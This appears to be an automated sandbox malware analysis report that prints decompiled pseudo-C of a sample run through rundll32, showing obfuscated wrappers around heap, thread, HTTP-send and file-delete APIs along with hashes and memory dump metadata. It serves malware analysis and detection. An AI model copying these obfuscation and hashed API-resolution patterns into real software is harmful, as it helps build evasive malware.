                                                                                                                                • Instruction Fuzzy Hash: 39111C72D00208FBDF04DFE4C909ADEBBB2EB44314F20C099E9146B255D7B69B24AB51
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 21%
                                                                                                                                			E00F5A025(long __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				void* _t27;
                                                                                                                                				void* _t34;
                                                                                                                                				signed int _t36;
                                                                                                                                				void* _t40;
                                                                                                                                				long _t42;
                                                                                                                                				long _t45;
                                                                                                                                
                                                                                                                                				_push(__ecx);
                                                                                                                                				_push(__ecx);
                                                                                                                                				_push(_a12);
                                                                                                                                				_t42 = __edx;
                                                                                                                                				_t45 = __ecx;
                                                                                                                                				_push(_a8);
                                                                                                                                				_push(_a4);
                                                                                                                                				_push(__edx);
                                                                                                                                				_push(__ecx);
                                                                                                                                				E00F4BB26(_t27);
                                                                                                                                				_v8 = 0xf7d3;
                                                                                                                                				_t36 = 0x27;
                                                                                                                                				_v8 = _v8 / _t36;
                                                                                                                                				_v8 = _v8 + 0x97d6;
                                                                                                                                				_v8 = _v8 + 0xe2e2;
                                                                                                                                				_v8 = _v8 ^ 0x0001f2e2;
                                                                                                                                				_v12 = 0x1c50;
                                                                                                                                				_v12 = _v12 + 0xffffe0b3;
                                                                                                                                				_v12 = _v12 + 0xffff6834;
                                                                                                                                				_v12 = _v12 ^ 0xffff1da8;
                                                                                                                                				_push(0xf90a85c5);
                                                                                                                                				_push(0xfcf1db7b);
                                                                                                                                				_t40 = 0x48;
                                                                                                                                				E00F5915E(_t40);
                                                                                                                                				_t34 = RtlAllocateHeap(_a12, _t42, _t45); // executed
                                                                                                                                				return _t34;
                                                                                                                                			}












                                                                                                                                APIs
                                                                                                                                • RtlAllocateHeap.NTDLL(?,0000CB58,3EFFABFF,?,?,?,?,000014CE), ref: 00F5A0A8
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocateHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                • Opcode ID: fcb23a4921863ba7656f297d00ef9158a0502676cff695b8d934dd5012400d04
                                                                                                                                • Instruction ID: 80975676b61bba4499476c1eb6a7b1eed2c26f6672e31789201997ce5dc86a92
                                                                                                                                • Opcode Fuzzy Hash: fcb23a4921863ba7656f297d00ef9158a0502676cff695b8d934dd5012400d04
                                                                                                                                • Instruction Fuzzy Hash: 48016972901308BBDB14CF95CD49C8EBB78EF81320F208098F908622A0E7B94B509B50
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 34%
                                                                                                                                			E00F57F4D(_Unknown_base(*)()* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a28, intOrPtr _a36) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				void* _t19;
                                                                                                                                				void* _t24;
                                                                                                                                				_Unknown_base(*)()* _t32;
                                                                                                                                
                                                                                                                                				_push(__ecx);
                                                                                                                                				_push(__ecx);
                                                                                                                                				_push(_a36);
                                                                                                                                				_t32 = __ecx;
                                                                                                                                				_push(0);
                                                                                                                                				_push(_a28);
                                                                                                                                				_push(0);
                                                                                                                                				_push(0);
                                                                                                                                				_push(0);
                                                                                                                                				_push(_a12);
                                                                                                                                				_push(_a8);
                                                                                                                                				_push(_a4);
                                                                                                                                				_push(__ecx);
                                                                                                                                				E00F4BB26(_t19);
                                                                                                                                				_v12 = 0x1df8;
                                                                                                                                				_v12 = _v12 + 0xffff3b42;
                                                                                                                                				_v12 = _v12 ^ 0xffff4a91;
                                                                                                                                				_v8 = 0xe7e1;
                                                                                                                                				_v8 = _v8 + 0x695e;
                                                                                                                                				_v8 = _v8 ^ 0x00014092;
                                                                                                                                				E00F5915E(0xf4, 0x65775614, 0xf90a85c5);
                                                                                                                                				_t24 = CreateThread(0, 0, _t32, _a12, 0, 0); // executed
                                                                                                                                				return _t24;
                                                                                                                                			}








                                                                                                                                APIs
                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_0000A552,00F4C7B0,00000000,00000000,?,?,?,?,00000000,1FD16849,Function_0000A552,Function_0000A552,?,00F4C7B0), ref: 00F57FC4
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: CreateThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2422867632-0
                                                                                                                                • Opcode ID: e6821cd9605109ce106dc498b339820a3e02c00524c4fc4ea37bd48af401306a
                                                                                                                                • Instruction ID: d200368ea2f4c483c1f6d98c5a3f62079e5c8e86b4c21b63eee6ef4202174de7
                                                                                                                                • Opcode Fuzzy Hash: e6821cd9605109ce106dc498b339820a3e02c00524c4fc4ea37bd48af401306a
                                                                                                                                • Instruction Fuzzy Hash: 49012CB2801249BBDF259F96CC49CEF7F79EFC9710F10415CB90866110E2765B10EBA0
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 70%
                                                                                                                                			E00F41342(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a16) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				void* _t28;
                                                                                                                                				char _t36;
                                                                                                                                				signed int _t38;
                                                                                                                                				void* _t44;
                                                                                                                                
                                                                                                                                				_push(_a16);
                                                                                                                                				_t44 = __edx;
                                                                                                                                				_push(0);
                                                                                                                                				_push(_a8);
                                                                                                                                				_push(_a4);
                                                                                                                                				_push(__edx);
                                                                                                                                				E00F4BB26(_t28);
                                                                                                                                				_v8 = 0x8780;
                                                                                                                                				_v8 = _v8 + 0xffff9f50;
                                                                                                                                				_t38 = 0x3a;
                                                                                                                                				_v8 = _v8 * 0x1a;
                                                                                                                                				_v8 = _v8 + 0x63da;
                                                                                                                                				_v8 = _v8 ^ 0x00041ec0;
                                                                                                                                				_v12 = 0xafde;
                                                                                                                                				_v12 = _v12 / _t38;
                                                                                                                                				_t20 = _t38 + 0x57; // 0x91
                                                                                                                                				_v12 = _v12 | 0x179de87f;
                                                                                                                                				_v12 = _v12 ^ 0x179d9f75;
                                                                                                                                				E00F5915E(_t20, 0x33111eaa, 0xf90a85c5);
                                                                                                                                				_t36 = RtlFreeHeap(_t44, 0, _a16); // executed
                                                                                                                                				return _t36;
                                                                                                                                			}









                                                                                                                                APIs
                                                                                                                                • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,00009110,975475C6), ref: 00F413C5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FreeHeap
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                • Opcode ID: 39ce39af03f8ec80897882bdd1de28d0da040609fd36dbfefdf91bfd12370ee8
                                                                                                                                • Instruction ID: 345d185d25a353017c80466b7657df9ec1ed16b2a1c6d6c85221db729b8e6759
                                                                                                                                • Opcode Fuzzy Hash: 39ce39af03f8ec80897882bdd1de28d0da040609fd36dbfefdf91bfd12370ee8
                                                                                                                                • Instruction Fuzzy Hash: 17018871902308FBEB18DFD4DD469CEBFB5EB40324F208098F8096B251D7BA9B149B91
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 50%
                                                                                                                                			E00F4DAD9(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12, WCHAR* _a16, intOrPtr _a24, long _a28, void* _a32) {
                                                                                                                                				unsigned int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				void* _t28;
                                                                                                                                				int _t33;
                                                                                                                                
                                                                                                                                				_push(_a32);
                                                                                                                                				_push(_a28);
                                                                                                                                				_push(_a24);
                                                                                                                                				_push(0xffffffff);
                                                                                                                                				_push(_a16);
                                                                                                                                				_push(_a12);
                                                                                                                                				_push(_a8);
                                                                                                                                				_push(_a4);
                                                                                                                                				E00F4BB26(_t28);
                                                                                                                                				_v12 = 0x69ca;
                                                                                                                                				_v12 = _v12 + 0xffff802c;
                                                                                                                                				_v12 = _v12 ^ 0xffff9515;
                                                                                                                                				_v8 = 0x39d2;
                                                                                                                                				_v8 = _v8 << 3;
                                                                                                                                				_v8 = _v8 >> 8;
                                                                                                                                				_v8 = _v8 + 0xcbb5;
                                                                                                                                				_v8 = _v8 ^ 0x0000aaa3;
                                                                                                                                				E00F5915E(0x13f, 0xdfd0d8a, 0x699633b1);
                                                                                                                                				_t33 = HttpSendRequestW(_a32, _a16, 0xffffffff, _a12, _a28); // executed
                                                                                                                                				return _t33;
                                                                                                                                			}







                                                                                                                                APIs
                                                                                                                                • HttpSendRequestW.WININET(?,?,000000FF,?,?), ref: 00F4DB5C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: HttpRequestSend
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 360639707-0
                                                                                                                                • Opcode ID: 9ac3a5b75d77f5d8e601b179574ab365d901e5de0fc98aab35fc7be4905c97f5
                                                                                                                                • Instruction ID: 45dbd7d0db6256148e25d95acfdd61f70f7166b6e7a7342712dbc49854f9b810
                                                                                                                                • Opcode Fuzzy Hash: 9ac3a5b75d77f5d8e601b179574ab365d901e5de0fc98aab35fc7be4905c97f5
                                                                                                                                • Instruction Fuzzy Hash: 0A019372905209FBDF06CF94CD468DE7BB6EB48314F148298FA14222A0D7B6DA64EB51
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                APIs
                                                                                                                                • QueryFullProcessImageNameW.KERNEL32(005EBC4F,00000000,0001DF7D,00000000,?,?,?,?,?,?,?,?,?), ref: 00F47D82
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: FullImageNameProcessQuery
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3578328331-0
                                                                                                                                • Opcode ID: d82359bdbf85a5f9da5bbcf48d06fb0f4bebfec423bd04585118749198a83fad
                                                                                                                                • Instruction ID: 0adf7fe24e4fd1a4f95f34faedd7270d010e12a75cf274c15f601327a31ef4b6
                                                                                                                                • Opcode Fuzzy Hash: d82359bdbf85a5f9da5bbcf48d06fb0f4bebfec423bd04585118749198a83fad
                                                                                                                                • Instruction Fuzzy Hash: 7A01E97280120DFBDF15DF94CD09ACDBBB1FB04315F208098F915661A1D7BA5B64AB81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 76%
                                                                                                                                			E00F4EC03(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                				signed int _v8;
                                                                                                                                				unsigned int _v12;
                                                                                                                                				signed int _v16;
                                                                                                                                				intOrPtr _v20;
                                                                                                                                				void* _t18;
                                                                                                                                				int _t23;
                                                                                                                                				WCHAR* _t27;
                                                                                                                                
                                                                                                                                				_push(_a8);
                                                                                                                                				_t27 = __ecx;
                                                                                                                                				_push(_a4);
                                                                                                                                				_push(__ecx);
                                                                                                                                				E00F4BB26(_t18);
                                                                                                                                				_v16 = _v16 & 0x00000000;
                                                                                                                                				_v20 = 0x3d8b94;
                                                                                                                                				_v12 = 0xf7e4;
                                                                                                                                				_v12 = _v12 >> 4;
                                                                                                                                				_v12 = _v12 ^ 0x00003af5;
                                                                                                                                				_v8 = 0xda3c;
                                                                                                                                				_v8 = _v8 ^ 0x668fce02;
                                                                                                                                				_v8 = _v8 ^ 0x668f1b8f;
                                                                                                                                				E00F5915E(0x219, 0x1db8a402, 0xf90a85c5);
                                                                                                                                				_t23 = DeleteFileW(_t27); // executed
                                                                                                                                				return _t23;
                                                                                                                                			}











                                                                                                                                APIs
                                                                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00004AF9), ref: 00F4EC6C
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: DeleteFile
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4033686569-0
                                                                                                                                • Opcode ID: dcd1d90f73fac76bf9b3a1e63dadbd328fb9e15a16341a6723b63b010a692415
                                                                                                                                • Instruction ID: 647580a5064252f6d96e90b062bf5ba0ab922c09da9332b0e56ee06726c35ea3
                                                                                                                                • Opcode Fuzzy Hash: dcd1d90f73fac76bf9b3a1e63dadbd328fb9e15a16341a6723b63b010a692415
                                                                                                                                • Instruction Fuzzy Hash: FCF049B5C05218FBDB05EFE4DC0A9EEBBB8EB01315F108099E80462241D7B55B199B82
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                C-Code - Quality: 71%
                                                                                                                                			E00F42B19(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, void* _a12) {
                                                                                                                                				signed int _v8;
                                                                                                                                				signed int _v12;
                                                                                                                                				void* _t17;
                                                                                                                                				int _t22;
                                                                                                                                
                                                                                                                                				_push(_a12);
                                                                                                                                				_push(_a8);
                                                                                                                                				_push(_a4);
                                                                                                                                				E00F4BB26(_t17);
                                                                                                                                				_v12 = 0xc7df;
                                                                                                                                				_v12 = _v12 ^ 0x73d98dc9;
                                                                                                                                				_v12 = _v12 ^ 0x73d97e92;
                                                                                                                                				_v8 = 0x972;
                                                                                                                                				_v8 = _v8 + 0xffff84fd;
                                                                                                                                				_v8 = _v8 ^ 0xffffc84b;
                                                                                                                                				E00F5915E(0xd2, 0x43dfce72, 0xf90a85c5);
                                                                                                                                				_t22 = FindCloseChangeNotification(_a12); // executed
                                                                                                                                				return _t22;
                                                                                                                                			}








                                                                                                                                APIs
                                                                                                                                • FindCloseChangeNotification.KERNEL32(?), ref: 00F42B7B
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID: ChangeCloseFindNotification
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 2591292051-0
                                                                                                                                • Opcode ID: 04e96b576e38e6b4094c033d3c5e6eaaf5abb4b8abcc3040c6a966b78a330fa9
                                                                                                                                • Instruction ID: 3105fde2762e2938c17c87b36110ee74499a2a96b0eb517f0f4fe30b93882215
                                                                                                                                • Opcode Fuzzy Hash: 04e96b576e38e6b4094c033d3c5e6eaaf5abb4b8abcc3040c6a966b78a330fa9
                                                                                                                                • Instruction Fuzzy Hash: F5F030B1814208FFEF04DFE4DC4699E7F74EB50300F108588F81566212E7759B20AB54
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Non-executed Functions

                                                                                                                                C-Code - Quality: 100%
                                                                                                                                			E00F4166C() {
                                                                                                                                
                                                                                                                                				return  *[fs:0x30];
                                                                                                                                			}



                                                                                                                                0x00f41672

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000008.00000002.922521031.0000000000F41000.00000020.00000001.sdmp, Offset: 00F40000, based on PE: true
                                                                                                                                • Associated: 00000008.00000002.922510468.0000000000F40000.00000004.00000001.sdmp
                                                                                                                                • Associated: 00000008.00000002.922542451.0000000000F5C000.00000004.00000001.sdmp
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_8_2_f40000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                                                                                                • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                                                                                                • Instruction Fuzzy Hash:
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%